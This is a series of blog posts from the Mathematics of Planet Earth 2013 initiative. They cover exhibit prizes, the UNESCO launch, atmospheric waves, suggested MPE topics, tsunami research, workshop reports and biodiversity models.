    The members of the jury were Tom Banchoff (USA; author of the “Flatland” books), Ehrhard Behrends (Germany; chair of the committee for “raising the public awareness of mathematics” of the European Mathematical Society), Ana Eiró (former director of the Science Museum in Lisbon, Portugal), George Hart (USA; working in “art and mathematics”, one of the curators of MoMath in New York), Oh Nam Kwom (Korea; very active in the popularizaiton of mathematics in Korea); Adrian Paenza (Argentina; known in the Spanish speaking world for his popular mathematical books and his TV performances).

    The jury met in early January in Providence (USA) to

    I. Select the winners of the first, second, and third prize;
    II. Recommend the modules to be shown at the exhibitions in Paris and in museums in connection with MPE2013; and
    III. Make further recommendations for the virtual exhibition.

    Following are the three entries selected by the jury for the prizes, with their citations:

    Third prize: “How to predict the future of glaciers?”, by the team of Guilleaume Jouvet (France/Switzerland/Germany)

    “In an entertaining way, this video illustrates the collaboration between a mathematician and a glacier expert as they develop a dynamic model for the evolution of glaciers. At the end of the video, the user can choose among alternative scenarios to see possible futures for the Aletsch glacier in the Alps.”

    Second prize: “Dune Ash”, by the team of Tobias Malkmus (Germany)

    “This interactive computer program graphically simulates the dispersion of a volcanic ash cloud using a mathematical model. The user chooses the location of the volcano, sketches the direction and strength of the winds, and sets the rate of dispersion. An original interface allows the user to specify complex wind patterns and invites repeated exploration.”

    First prize: “Sphere of the Earth”, by the team of Daniel Ramos (Spain)

    “This exhibit shows that maps of the spherical surface of the earth on a flat plane must have distortions. The user interactively selects a disc region and sees how various maps distort it. The engaging and easy-to-use interface effectively conveys mathematical ideas relevant to the earth.”

    The prize ceremony took place at the UNESCO Headquarters Paris in the morning of March 5.

    Posted in MPE Exhibit | Leave a comment

    European Launch of MPE2013 – UNESCO, Paris, March 5, 2013

    Today, Europe celebrates an exceptional event for mathematics. Our concern today is the exposure to scientists and to society at large of one of the most valuable heritages of human knowledge: mathematics. And this is happening not only at the UNESCO headquarters in Paris, but also simultaneously in many other countries across Europe.

    The fantastic idea to create Mathematics of Planet Earth 2013 (MPE2013), the support of the International Mathematical Union (IMU), and the involvement of UNESCO, together make possible the opening of this exciting event.

    The inaugural fireworks will be followed by a tremendous number of activities organized in the framework of MPE2013 throughout the year. These include not only conferences, workshops, lectures, exhibitions, articles in journals and magazines, and books, but also contributions to blogs by fans of mathematics, posts on Facebook, tweets, and many other spontaneous contributions.

    The European Mathematical Society (EMS) is very proud to count itself among the very many partners of MPE2013, and to have helped generate enthusiasm for the initiative through its more than 90 corporate members. Some long-term scientific programmes taking place in ERCOM Centres–the EMS network of mathematical research centres in Europe–are devoted to topics inspired by MPE2013. Others host specific activities of MPE2013, like schools or public lectures. The EMS is also contributing its experience and expertise through its committee Raising Public Awareness of Mathematics.

    It is not the first time that UNESCO gives its explicit support to international endeavors to highlight the central importance of mathematical sciences and their applications. In the year 2000, UNESCO endorsed the IMU’s initiative World Mathematical Year 2000 (WMY2000). Under this banner, mathematicians across the planet contributed to increasing public awareness of mathematics, to showcasing mathematics as a key for progress and development, and to discussing the challenges of the new century.

    The tremendous success of WMY2000 proved the capacity of the mathematical community to cooperate in large-scale initiatives of utmost importance for the development of its discipline. This might have produced surprise even within mathematical circles. In contrast with other scientific fields, mathematical organizational units are quite small, and the social attitude of mathematicians is sometimes misperceived as introverted.

    Thirteen years later, and partly thanks to the beneficial results from WMY2000, the new initiative MPE2013 starts a long journey in a community with more scientific and social leverage than it enjoyed in the year 2000. Today, mathematicians are in an even better position to exhibit once more their capacity of coordination to reach objectives that require strong efforts. Thus, I am fully confident that this very ambitious project will be an undeniable success.

    Why Mathematics of the Planet Earth?

    By being the driving force behind modern science, mathematics is the natural partner in multidisciplinary teams devoted to exploring, approaching and tackling global issues, which often crucially require mathematical and computational thinking, and mathematical modelling.

    Some of these complex issues consist of pressing problems for the planet, like natural disasters and catastrophes, financial crises, food security, pandemic diseases. Others are related to development and progress, like setting up the conditions to build inclusive innovative and secure societies, achieving cooperation among diverse communities, managing networks, preserving ecosystems, developing and enhancing vital communications.

    The initiative MPE2013 was conceived with the objective of providing a world wide showcase for the contributions made by mathematical sciences to global problems. This objective is being enriched and complemented by other activities, less transparent to the wider public, consisting solely of knowledge generation, of building theories. There is a necessity to value and to highlight this crucial aspect of mathematical activity too. Let us recall Leonardo da Vinci’s statement: “Practice must always be built upon good theory.”

    Public awareness of mathematics should not be confined to practical results of mathematical activity but also to striking theories, to the intricate mental process of mathematical creation and the conditions for its best development, to its value for human culture. Mathematics is all that.

    I began this contribution to the blog by describing the MPE2013 initiative as an exposure of mathematics to the public. It is even more than this. MPE2013 is also a Manifesto on the commitment of mathematics to society.

    Marta Sanz-Solé, President
    European Mathematical Society

    Posted in General, Public Event | Leave a comment

    Quel climat pour demain ? L’apport des modèles

    par Sylvie Joussaume, directrice de Recherche au CNRS, Institut Pierre-Simon Laplace

    Kafemath à “La Coulée Douce”, 51 rue du Sahel, Paris 12 ième
    jeudi 14 mars 2013 à 20 heures.

    Résumé d’auteur: “Les observations mettent en évidence un réchauffement global du climat et une augmentation de la concentration en gaz à effet de serre dans l’atmosphère. Afin d’interpréter ces observations et d’étudier comment le climat pourrait évoluer dans l’avenir en fonction des activités humaines, on a développé des modèles de climat capables de représenter le fonctionnement du système climatique atmosphère-terre-océans. Ces modèles s’appuient sur les principes de base de la physique et utilisent des méthodes numériques des mathématiques. Au-délà d’incertitudes liées aux modèles eux-mêmes et à la variabilité du climat, les modèles s’accordent à prévoir une poursuite du réchauffement et un rôle déterminant des activités humaines dans les modifications du climat déjà observées. Ce réchauffement dépendra cependant fortement des choix de société, notamment en matière énergétique.”

    Posted in Climate Modeling | Leave a comment

    Atmospheric waves and the organization of tropical weather

    Though waves of one sort or another are a ubiquitous part of our daily experience (think of the light from your screen or the sound from your kids in the other room), we have to get on with our lives, and therefore tend not to think of the wavelike nature of daily phenomena. Those fortunate among us who can escape to the shore on a hot August week can then take the time to observe the sea and the waves she sends us.

    Sitting by the shore we watch these waves rise, as if out of nothing, break, and then crash on the beach. We see a slow, nearly periodic pattern in the swell punctuated by a burst of white water. In fact, for most of us, the word “wave” evokes this wave, the oceanic surface, shallow water, gravity wave. Among all waves, it is in this phenomenon that we are able to observe (in fact experience) most of the properties of a wave. We see its wavelength, its crest and its trough and we can hear its period by listening to the breakers.

    However, what we often do not see is the origin of the wave. Far out in the ocean, storms generate strong winds which raise and depress the ocean surface, thereby generating waves. As surfers are well aware, these waves travel thousands of kilometers and ultimately release their energy on the coastlines. What we do see, but may not realize, is that the breaking of the wave ultimately releases the wave energy in a manner that cannot be re-injected into the wave. It splashes, sprays and erodes the shoreline, thereby dissipating its energy. Furthermore, the wave height, itself, changes as the wave enters shallower water – which is why, from the shore, waves appear to grow from the ocean as if from nothing.

    Imagine standing at the eastern edge of a California bay and staring west at the Pacific Ocean as waves from tropical storms are rounding the point at the southern end of the bay. If we want to calculate the coastal erosion associated with these waves, we need only know some aggregate properties of the waves; wavelength, height and average frequency of occurrence should suffice. However, if we want to determine the best surfing times, we need to know the timing of a particular tropical storm and its energy – thereby knowing the properties of the waves it produces and what time to be on the water in order to catch them. If storm systems appear in the North Pacific at the same time as tropical Pacific storms, then the waves from both systems will interact and break in a wholly different manner on the California coast than if the storm systems had not coincided.

    The atmosphere contains waves which are very much similar to the oceanic gravity wave. They are called “internal gravity waves” because they occur throughout the depth of the weather layer of the atmosphere, not just at its upper surface. We experience these waves as pressure and wind undulations with very low frequencies – wind blows from the east one day, from the west the next day and from the east again the following day. Gravity waves exist on a wide variety of wavelengths, from meters to kilometers to thousands of kilometers. In the grossest sense, they are all generated in the same manner; something pushes the air up.

    The most interesting phenomena that push the air up are thunderstorms – also known as atmospheric convection. Moist air is lifted up to a height where the air is colder and the water begins to condense, releasing its latent heat and forming a cloud. This is the opposite of what occurs in a humidifier, where water is heated in order to evaporate it and moisten the air. In the atmosphere, as the heat is released the air warms and becomes less dense than its surroundings, thereby rising into a cooler environment and causing it to condense even more. Under the right conditions, this becomes a runaway process whereby the condensation continues and the cloud rises until it hits the top of the weather layer; the tropopause. As the air rises and the thunderstorm forms, ambient air is being sucked into the bottom of the cloud while the top of the cloud is pushing air away from it. This process is highly agitating to the atmosphere and generates a gravity wave. This is not unlike a pebble falling into a pond and generating a surface water gravity wave.

    However, the atmospheric gravity wave differs from the surface water wave in a very crucial way. As the wave travels away from the thunderstorm which generated it, it raises moist air, thereby cooling it and initiating condensation and, possibly, another thunderstorm. Thunderstorm cells cluster around one another so that, in the words of Brian Mapes, convection tends to be gregarious.

    Just as the gravity waves occur on many length scales, so too does this organization. On the largest scales, thunderstorm systems over the Indian Ocean generate gravity waves with six thousand kilometers longitudinal extent. These are called equatorial Kelvin waves and they travel eastward along the equator for twenty thousand kilometers until they hit the Andes of South America. Along the way they excite thunderstorm activity along the whole equatorial Pacific Ocean.

    From time to time, these Kelvin waves encounter other kinds of waves (Rossby waves) coming from the North Pacific and when they do, warm, moist, tropical Pacific air is channeled toward the western United States. In turn, this air sends storms and rain across the North American continent. So, in order to predict weather over the U.S. we have to carefully observe what is happening over Alaska and the Indian Ocean several days prior.

    Kelvin waves move fast, and computer simulations of climate have yet to accurately simulate them. Just as understanding coastal erosion does not require detailed knowledge of the timing of surface waves, simply their aggregate properties, so too, predictions of climate change are not affected by the details of atmospheric waves, since we have a good understanding of their average properties.

    But surfers need to know the timing of the waves – both from north and south. So too, in order to improve weather forecasts and to understand of how climate change will modify weather, we must understand atmospheric waves. How often do tropical Kelvin and North Pacific Rossby waves coincide? Under what conditions will they interact to cause storm systems? How do these waves interact with the ocean and thereby change the moisture of the air in which they travel? Least understood of all, what will happen to these wave interactions as our climate changes? Just as there is energy in the ocean surface waves that must be deposited on some coastline, so too there is energy in moist tropical air that must be released somewhere in the form of rain; somewhere other than where it is being released now. This means that the pattern of rains will change for the whole Pacific basin, which is all the more concerning for places like California.

    Joseph Biello
    Department of Mathematics
    UC Davis

    Posted in Atmosphere, Meteorology, Ocean | 2 Comments

    mpe2013.org

    MPE2013 Web Site

    Posted in General | Leave a comment

    What is an MPE topic?

    MPE2013 continues to spread among schools, science centers and universities. Many people are enthusiastic and eager to organize MPE activities. But what is an MPE topic?

    Many people associate mathematics with symmetries, for example in nature or in architecture. But these are not really MPE topics. In this blog I will do some brainstorming, with the expectation that we will all have a better idea of what are appropriate topics for MPE2013.

    First, let us list a number of potential topics. You have probably already heard of the four sub-themes of MPE2013:

    A planet to discover
    A planet supporting life
    A planet organized by humans
    A planet in danger

    When it comes to explaining the mathematics behind these topics at the elementary level, the first sub-theme immediately suggests a whole range of topics. In this blog, I will list thirteen topics, and I will come back with topics for the other sub-themes in a later blog.

    (1) Fractals.
    Fractals provide models for the shapes of nature: rocky coasts, ferns, the networks of brooks and rivers (think of river deltas). The fractal dimension is a measure of the “density” of a fractal, which allows us to compare fractals.

    (2) Solar system
    The inner planets (Mercury, Venus, Earth and Mars) have chaotic motions. Simulations show a 1% chance that Mercury destabilizes and encounters a collision with the Sun or Venus. There is a much smaller chance that all the inner planets destabilize and that there is a collision between the Earth and either Venus or Mars in ~3.3Gyr (Jacques Laskar, 2009)

    (3) The Moon stabilizes the Earth
    The Moon stabilizes the rotation axis of the Earth. Jacques Laskar’s simulations (1994) showed that if we removed the Moon, then the Earth’s axis would undergo large oscillations and we would not experience the climates that we now have.

    (4) Why seasons?
    This theme is standard but, in many countries, it has disappeared from basic science education and needs to be taught independently. What is the mathematical definition of the Polar circles and the Tropics? Can we find a formula to compute the length of the day at different dates depending on the latitude? Or a formula to compute the angle of the Sun at noon at different latitudes and different dates?

    (5) Eclipses
    There are two types of eclips: Sun eclipses and Moon eclipses. Explanation of the phenomenon. Predictions of the eclipses.

    (6) Weather prediction
    The use of models. The butterfly effect and sensitivity to initial conditions.  

    (7) Exploring Earth through remote sensing
    The use of aerial photographs to discover resources, or the use of seismic waves for analyzing the inner structure of the Earth and discovering underground resources. For instance, in 1938, the Danish mathematician Inge Lehman discovered the solid inner core of the Earth by studying the anomalies in the paths of the seismic waves of large earthquakes recorded at stations around the world.

    (8) Localizing events
    Localizating events like earthquakes and thunderstorms is done through triangulation, where several distant stations note the time when they register the event. It provides an interesting application of the hyperbola: indeed, knowing the arrival time of a signal at two different stations allows us to locate the origin of the signal on a branch of a hyperbola.

    (9) Global Positioning System (GPS)
    The receiver measures its distance to satellites with known positions. From this data, the receiver deduces that it is located on spheres centered at the satellites. Knowing the distance from three satellites allows locating the receiver. Applications include measuring the height of mountains like Everest and Mont Blanc and evaluating their growth, and also measuring the movements of tectonic plates.

    (10) Cartography
    It is not possible to draw a map of the Earth and respect ratios of distances. Any mapping process is a compromise. The Lambert equivalent projection preserves ratios of areas. The Mercator projection preserves angles. The loxodromes on the sphere are curves, which make a constant angle with the meridians.

    (11) Measuring the Earth
    The use of tools in geography to measure the Earth: instruments to measure angles like the sextant, the heliotrope (invented by Gauss), etc. How do we measure the height of a mountain? How do we draw maps of a region?

    (12) Tectonic plates and continental drift
    Mathematicians study the dynamics of the planet mantle as an application to geosciences. The mantle is viscous, thus allowing for the continental drift. The small movement of each tectonic plate is a rotation around an axis through the center of the Earth and passing through the Eulerian poles of the plate.

    (13) Earth’s rotation
    Why do earthquakes and tsunamis change the speed of rotation of the Earth? During earthquakes and tsunamis, the mass distribution in Earth’s crust changes. This changes the moment of inertia of the Earth, which is the sum of the moments of inertia of each point. The moment of inertia of one point mass is the product of its mass by the square of its distance to the axis of rotation. Meanwhile the angular momentum is preserved. Hence if the moment of inertia of the Earth decreases (increases), the angular velocity of the Earth increases (decreases). The beauty of physics lies in the ability of simple principles, like conservation of angular momentum, to explain disparate phenomena such as Earth’s changing rotation rate, figure skaters spinning, balancing moving bicycles, spinning tops, and gyroscopic compasses. The major earthquakes in Chile (2010) and Japan (2011) increased the Earth’s speed of rotation and hence decreased the length of the day. These earthquakes have also moved the Earth figure axis, which is the axis about which the Earth’s mass is balanced.

    Posted in General | Leave a comment

    Quel climat pour demain ? L’apport des modèles.

    Par Sylvie Joussaume, directrice de Recherche au CNRS, Institut Pierre-Simon Laplace.

    Kafemath à “La Coulée Douce”, 51 rue du Sahel, jeudi 14 mars 2013 à 20 heures.

    Résumé d’auteur:”Les observations mettent en évidence un réchauffement global du climat et une augmentation de la concentration en gaz à effet de serre dans l’atmosphère. Afin d’interpréter ces observations et d’étudier comment le climat pourrait évoluer dans l’avenir en fonction des activités humaines, on a développé des modèles de climat capables de représenter le fonctionnement du système climatique atmosphère-terre-océans. Ces modèles s’appuient sur les principes de base de la physique et utilisent des méthodes numériques des mathématiques. Au-delà d’incertitudes liées aux modèles eux-mêmes et à la variabilité du climat, les modèles s’accordent à prévoir une poursuite du réchauffement et un rôle déterminant des activités humaines dans les modifications du climat déjà observées. Ce réchauffement dépendra cependant fortement des choix de société, notamment en matière énergétique.”

    Posted in General @fr | Leave a comment

    Letting a Thousand MPEs Bloom

    MPE2013 is a success. It is has generated enthusiasm all over the world, and it is giving mathematics more visibility than we could have hoped for. The fact that over 120 organizations in many countries have joined MPE2013 as partners is an indication that we have hit a resonance.

    As a life-long applied mathematician, I am of course very pleased with this outcome. I have often wondered how we can make applied mathematics more visible and present our discipline as an invaluable component of the scientific enterprise. Applied mathematics lacks the glamour that core mathematics generates with its “open problems.” Think of the four-color problem, Fermat’s last theorem, the Poincaré conjecture: all rather abstruse concepts, but they made the news in a big way. Would anything like that ever happen to geometric singular perturbation theory, or homogenization? I doubt. Yet, applied mathematics provides the infrastructure for science, engineering, and the life sciences. The trouble is: infrastructure is mostly invisible.

    But MPE2013 has hit a chord. It has caught the attention of a wider audience, it has a catchy sound to it and could give us a handle to better advertise our stuff. So I have a suggestion. We adopt the MPE brand, trademark it and exploit it to present applied mathematics as a partner in society’s quest for a sustainable future. Anyone who is working at the interface of mathematics and Planet Earth is welcome to use the brand name, and soon we will see a thousand MPEs bloom.

    TM

    Posted in General | Leave a comment

    Nonlinear Waves and the Growth of a Tsunami

    This past week at AIM Mark Ablowitz told me about an interesting article (with beautiful pictures) he wrote with Douglas Baldwin called “Nonlinear shallow ocean-wave silicon interactions on flat beaches.” The propagation of these waves may contribute to the growth of tsunami waves.

    The article appears in the journal Physical Review E, (86), but it has also gained a lot of media attention and was written up as a synopsis on the American Physical Society (APS) web site. There are some nice videos that one can see from the link.

    It was subsequently identified as a special focus article in Physics Today in the November issue. It also was featured by the American Meteorological Society Bulletin (January, 2013) and then in other science news: `OurAmazingPlanet’ New Scientist; NRC Handelsblad: the largest evening newspaper in Netherlands; NBC.com; National (U.S.A.) Tsunami Hazard Mitigation Program, and others.

    As reported in the synopsis, “Previously, the assumption was that these interactions are rare. However, the authors have observed thousands of X and Y waves shortly before and after low tide at two flat beaches, where water depths were less than about 20 centimeters. The researchers showed that the shallow waves could be accurately described by a two-dimensional nonlinear wave equation.”

    Estelle Basor
    AIM

    Posted in Geophysics, Ocean | 2 Comments

    Report from AIM: “Nonlinear wave equations and integrable systems – Mathematics for a nonlinear planet”

    Prepared by Gino Biondini and Barbara Prinari

    A small research group has been meeting at the American Institute of Mathematics (AIM) in Palo Alto, CA, during the week of Feb. 18-22 to work on integrable systems of nonlinear Schroedinger type, a special class of nonlinear partial differential equations (PDEs).

    Nonlinear Schroedinger (NLS) equations are the simplest models that describe the evolution of weakly nonlinear dispersive wave trains. As such, they have been studied as models for many important natural phenomena, such as deep water waves, ion-acoustic waves in plasmas, and propagation of laser pulses in optical fibers. Indeed, the NLS equation has provided an invaluable tool for the study of optical fiber telecommunication systems over the last forty years. An emerging application that has also attracted great scientific attention in the last 10 years is related to Bose-Einstein condensates (BECs). A BEC is a state of matter of a dilute gas of boson atoms cooled to temperatures very close to absolute zero. Under such conditions, a large fraction of the atoms occupy the lowest quantum state and quantum effects become evident even on a macroscopic scale. The state of the BEC is then described by the wavefunction of the condensate as a whole, which obeys a nonlinear equation known as the Gross-Pitaevskii equation. The existence of BECs was theorized in the 1920’s by Bose and Einstein, but only observed experimentally in 1995. Since then, the field has exploded. In a one-dimensional approximation (cigar-shaped traps), the model equation is then precisely the NLS equation. Recent studies also suggest that nonlinear solitary wave interactions described by the Kadomtsev-Petviashvili equation (another integrable system) could help to explain the generation of localized large amplitude waves such as those generated by the interaction of two wave stems in the Tohoku Japanese tsunami of 2012.

    One of the most interesting features of nonlinear integrable systems from a mathematical point of view is the fact that they possess a surprisingly rich and beautiful structure, and powerful analytical and asymptotic mathematical techniques are available to investigate the properties of these systems and solutions.

    Nonlinear integrable systems have been extensively studied, and a large body of knowledge has been accumulated on them. At the same time, new solutions and new properties continue to be found, and many fundamental questions are still open. Among them, initial-value problems with non-trivial boundary conditions and boundary value problems. This SQuaRE (Structured Quartet Research Ensemble) aims at addressing and resolving some of these issues.

    Posted in Mathematics, Workshop Report | Leave a comment

    Henbury Conservation Project

    This really interesting project was brought to my attention by Ian Noble at the JSPS Symposium on “Climate Change.” Thanks, Ian, for a very good presentation on “Land and Our Responses to Climate Change.” -HGK

    Preserving biodiversity and habitat

    The Carbon Farming Initiative (CFI) allows farmers and land managers in Australia to earn carbon credits by storing carbon or reducing greenhouse gas emissions on the land. These credits can then be sold to people and businesses wishing to offset their emissions.

    The CFI also helps the environment by encouraging sustainable farming and providing a source of funding for landscape restoration projects.

    The CFI is a carbon offsets scheme that is part of Australia’s carbon market. Legislation to underpin the CFI was passed by Parliament on 23 August 2011.

    One of the participants is Henbury Station, a spectacular property in Australia’s arid Red Centre. It covers more than 500,000 hectares (5,000 square kilometres) to the south of Alice Springs, extending from the spectacular MacDonnell Ranges across the vast, open red plains of the diverse Finke bioregion. While Henbury has previously operated as a cattle station, 70 per cent of the huge property remains largely in its natural condition.

    The $13 million property was purchased by R.M. Williams Agricultural Holdings in 2011 with the support of the Australian Government through its Caring for our Country initiative. It is the largest property ever purchased for the National Reserve System with Australian Government support.

    Posted in Carbon Cycle | Leave a comment

    SIAM Conference on Computational Science and Engineering

    One of the reasons for designating 2013 as the year of “Mathematics of Planet Earth” is to showcase the work done by mathematics in application areas like climate, ocean, and earth sciences. The SIAM Conference on CS&E, which begins on February 25th, contains many sessions relevant to MPE 2013.

    The SIAM Conference on CS&E (Computational Science and Engineering) focuses on computational methods, often in the context of an application. For example, the session on adjoint methods in the earth sciences focuses on a specific set of mathematical and computational methods for solving inverse problems, but with particular application to problems in seismology, meteorology, and geodynamics. Another example occurs in the control of air flow in commercial buildings – an important development for minimizing energy consumption – where model reduction techniques are developed and used for energy-efficient building design. Other examples are sessions on modeling and simulation of complex energy systems, such as the electrical power grid and cascading power system failures. New numerical tools are explored for improved modeling of weather, climate, and the oceans; these include cubed-sphere grids for atmospheric models, such as modeling tropical cyclones. Other sessions look at models for earthquake rupture dynamics. Sessions also look at new computational methods, such as using implicit solvers to overcome scale disparities, for various atmospheric and ocean models which are essential components in climate models. It is the mathematical models and computational methods that enable accurate models and predictive simulations that are essential for understanding the various phenomena relevant to planet earth.

    More reports on some of these will follow at a later date.

    Click here for more information on the SIAM Conference on CS&E.

    Posted in Computational Science, Conference Announcement | Leave a comment

    Report: JSPS Symposium on “Climate Change”

    On Friday, February 23, 2013, I attended a Symposium on “Climate Change,” organized by the Japan Society for the Promotion of Science (JSPS) and co-sponsored by the AAAS, NAS, NASA, NOAA and NSF. The symposium was held at the Cosmos Club in Washington, DC.

    The JSPS goes back to 1932, when it was established with an imperial endowment as a core funding agency to support the advancement of science. Recently, it was converted to an independent administrative agency that supports research programs at universities, awards fellowships to young scientists, and supports international research activities.

    The JSPS organizes symposia and workshops on a variety of topics. The theme of this symposium, “Climate Change,” was very timely. The scientific program was organized by Professor Akimasa Sumi (DSc Geophysics, 1985, University of Tokyo), Vice President, National Institute of Environmental Studies in Japan.

    The talks were organized around three themes: Atmosphere (coordinated by Akimasa Suni), Water (coordinated by Taikan Oki, Institute of Industrial Science, University of Tokyo), and Land (coordinated by Jayant Sathaye, Lawrence Berkeley Lab), although the boundaries were not always strictly maintained. The talks covered a broad spectrum of issues, ranging from GCMs to hydroclimate variability, water, natural resources, land cover, extreme events, risks, adaptation, mitigation, and social change. Some speakers elaborated on themes presented in IPCC AR4, other speakers covered new territory, anticipating IPCC AR5. There was a strong emphasis on regional problems, mostly related to China, India, Brasil, and California. The program can be found here.

    The symposium was attended by about 100 people, representing academia, government departments and agencies, professional societies, professional publications, and private companies. It was a day well spent; the presentations were informative, and I made several new contacts.

    Let me conclude with a personal observation. I was surprised to see that all the speakers and organizers of this symposium were male, with one exception (the NSF Program Director, who gave the concluding remarks at the end of the symposium). If I did not know any better, I could have concluded that climate science is the domain of men. Please, pay more attention to diversity.

    Posted in Climate Change, Conference Report | 1 Comment

    Letter from Banff

    I was planning to send an update every day from the data assimilation workshop at the Banff Center, but I’ve been so busy here that by the time I get back to my room I’m ready to collapse. The Banff Center is the best place I know of for a workshop. It’s almost like working hard and being on vacation at the same time, with the benefits of both. The scenery is spectacular, the facility is first rate, the food is wonderful and we are indeed working hard. As I told people who asked me what it would be like, you have to be at the top of your game the entire week. This is a talented enthusiastic group, the talks have been superb, all of them, and the discussion following the talks has been so interesting that nobody wants to stop.

    I knew it was going to be this way. I rode the shuttle from the Calgary airport to Banff Center with Kayo Ide, Andrew Lorenc and Juan Restrepo, and a serious scientific discussion broke out almost as soon as we settled into our seats. The two hour shuttle ride went by in a blink.

    We have 24 participants, some grad students, some postdocs, a few mid career types and a few old graybeards like me. We were expecting 26, but there were two last minute cancellations, both for medical reasons. There was a time when everyone in the world who worked on data assimilation in the ocean and atmosphere would have fit in the conference room here, but that was decades ago, and now the field is large enough that it’s impossible to know everybody, as it was in the late 1980s and early 1990s. I’m still surprised to hear about interesting work being done by people that I have never met.

    Andrew Lorenc gave the opening talk, as he did at the last Banff data assimilation meeting in 2008. He’s one of the very few people who’s still active and has been doing data assimilation longer than I have. He gave an excellent hour-long talk on the outlook for data assimilation at the UK Met Office for the next 5-10 years. We also had talks by people from Environment Canada, NASA and NCEP, and a nice talk on hurricane prediction by Fuqing Zhang.

    Tuesday’s talks were mostly concerned with ensembles, ensemble methods and direct calculation of probability density functions. Monday and Tuesday provided us with plenty of material for detailed discussion. We left Wednesday afternoon free for us to take a break and explore Banff and the surrounding mountains. A number of us went hiking. The views were spectacular, but the trails were icy and the steep parts were treacherous to navigate. Upon return to the Banff Center I took advantage of the excellent gym to have a swim and a soak in the hot tub.

    We had fewer talks today, with the hour-long finale given by Pierre Gauthier on diagnostics for data assimilation and models. Pierre is another one of the experienced people who attended. His topic was well chosen and his presentation was clear, thorough and thought provoking, as his presentations have been consistently over the twenty odd years that I have known him.

    Meetings like this are exceptional. The long discussions with talented enthusiastic people at all stages of their careers reminded me why I signed up for the life of a scientist. Details can be found on the BIRS website.

    Posted in Workshop Report | Leave a comment

    Some Mathematics Behind Biological Diversity

    Picture a meadow in spring: grasses and flowers abound, different species competing for our attention and appreciation. But these various species also compete for other things. They compete for water and essential resources to grow, for space, for light. A similar picture emerges when we look at animals: insects, birds, mammals, fish. Usually several species coexist in the same location, albeit not always peacefully, as we shall see.

    This diversity of species is beautiful, but it can be puzzling as well. Mathematical models and early biological experiments by G.F. Gause indicate that if two or more species compete for the same single limiting resource (for example water or nitrogen in the case of plants), then only the one species that can tolerate the lowest resource level will persist and all others will go extinct at that site. Granted, there may be more than one limiting resource. But S.A. Levin extended the mathematical result to say that no more species can stably coexist than there are limiting factors. In less mathematical terms: If one wants to have a certain number of biological species to coexist, then one needs to have at least that same number of ecological opportunities or niches. In the words of Dr. Seuss (from On Beyond Zebra)

    And NUH is the letter I use to spell Nutches
    Who live in small caves, known as Nitches, for hutches.
    These Nutches have troubles, the biggest of which is
    The fact there are many more Nutches than Nitches.
    Each Nutch in a Nitch knows that some other Nutch
    Would like to move into his Nitch very much.
    So each Nutch in a Nitch has to watch that small Nitch
    Or Nutches who haven’t got Nitches will snitch.

    These insights were powerful incentives to develop new theory and devise new experiments, mathematical and ecological, to explain why there is so much diversity of species almost everywhere we look. Most of the answers come in the form of some kind of “trade-off”.

    There is the spatial trade-off. Some species are better at exploiting a resource, some are better at moving towards new opportunities. After a patch of land frees up in the Canadian foothills – maybe from fire or logging -, aspen trees move in quickly and establish little stands there. Given enough time, the slower moving spruce will come and replace the aspen, because it can utilize the resources more efficiently.

    Another trade-off is temporal when the resource fluctuates. For example, water is fairly plentiful in the Canadian prairies in the spring, but later in the summer and the fall, there can be serious droughts. Some plants grow very fast early in the year when water is abundant, but are out-competed later in the year by others who can tolerate low water levels.

    When grazing or predatory species enter the picture, new opportunities for biodiversity open up. The trade-off now lies in being good at resource competition or being good at fending off predators. Sometimes, predation can induce cycles in an ecological system. A particularly well known cyclic system are the snowshoe hares and lynx in Western Canada. There is evidence for cycles already in the trading books of the Hudson’s Bay company. When the internal dynamics of predation induce cycling, the temporal trade-off can give additional opportunities for coexistence of competing species.

    Most recently, researchers in ecology and mathematics recognized that not all competitive relationships between species are truly competitive but sometimes mutualistic. For example, owls and hawks hunt similar rodent species, but one hunts at night and the other during the day. Combined they don’t give their prey a safe time to forage. In some cases, researchers have found that the predation rate of two competing predators combined is higher than the sum of the predation rates in isolation. Mathematical models then demonstrate that even moderate amounts of mutualistic behaviors between competing species lead to stable coexistence. One more mechanism to promote the coexistence of a large diversity of biological populations.

    ************************************************
    Frithjof Lutscher
    Department of Mathematics and Statistics
    University of Ottawa
    Frithjof.Lutscher@uottawa.ca
    Frithjof Lutscher
    ************************************************

    Posted in Biodiversity, Mathematics | Leave a comment

    Report on the Workshop “Stochastics in Geophysical Fluid Dynamics: Mathematical foundations and physical underpinnings”

    Prepared by Roger Temam (Indiana University) and Nathan Glatt-Holtz (University of Minnesota/Virginia Tech)

    Last week a workshop was held at the American Institute of Mathematics (AIM) in Palo Alto, California, around the theme of stochastic PDEs and applications in climate and weather modeling:

    “Stochastic in Geophysical Fluid Dynamics: Mathematical foundations and physical underpinnings.”

    The workshop brought together a lively mix of specialists in climate modeling and weather prediction alongside experts in the fields of deterministic and stochastic partial differential equations.  

    Stochastic Differential Equations (SDEs) have their origins in the study of Brownian motion the irregular motion of particles under the influence of random bombardment first observed by the botanist Robert Brown in the 19th century and later revisited by Albert Einstein in 1904.

    The mathematical theory traces its origins to the work of Norbert Wiener and Andrey Kolmogorov in the 1920’s. The key discovery of the stochastic integral and an associated ‘stochastic calculus’ which lies at the center of the theory occurred in the early 1940’s independently by Kiyoshi Itō and by Wolfgang Doeblin.

    Roughly speaking Browian Motion {B(t)}_{t \geq 0} is a time evolving random process which evolves according the the normal (Gaussian) distribution with mean zero and variance t. A key property is the Browian motion has ‘independent increments’ that is B(t) – B(s)is independent of B(s) – B( r) for any t> s> r. This last property gives Brownian motion it’s irregular character.

    Stochastic differential equations are equations driven by the derivative of brownian motion, ‘white noise’ which is used in modeling often as a proxy for uncertainty. Indeed today SDEs are widely used in diverse modeling applications ranging from biological population models to hedging in finance, where they provide the foundation for the infamous Black–Scholes–Merton Model. From a theoretical point of view they play a central role in the modern theory of probability and stochastic processes.

    The study of Stochastic Partial Differential equations (SPDEs) traces its origins to the 1960. They first appeared in the theory of filtering (the optimal melding of empirical data with a dynamical model to more accurately predict the state of a physical system), in the study of turbulence in fluid flows and in biological models of neurons.

    Since the 1970 SDEs and SPDEs have played an increasingly large role in climate and weather applications.As it was explained during the wokshop, SDEs and SPDEs are introduced for various reasons: to account for uncertainties in the various data introduced in the codes (e.g. initial and boundary conditions); they are also used also to account for the uncertainties in the physics for some complex phenomena (such as the parameterization of the clouds, or of the strength of the wind above the oceans); it is also used to account for the errors due to the discretizations. For example the typical mesh used in the General Circulation Models (CGM) is nowadays of about 15 to 25 km; this does not allow for a fine description of the cloudiness in the numerical cells, and statistics is used to give an averaged local description.

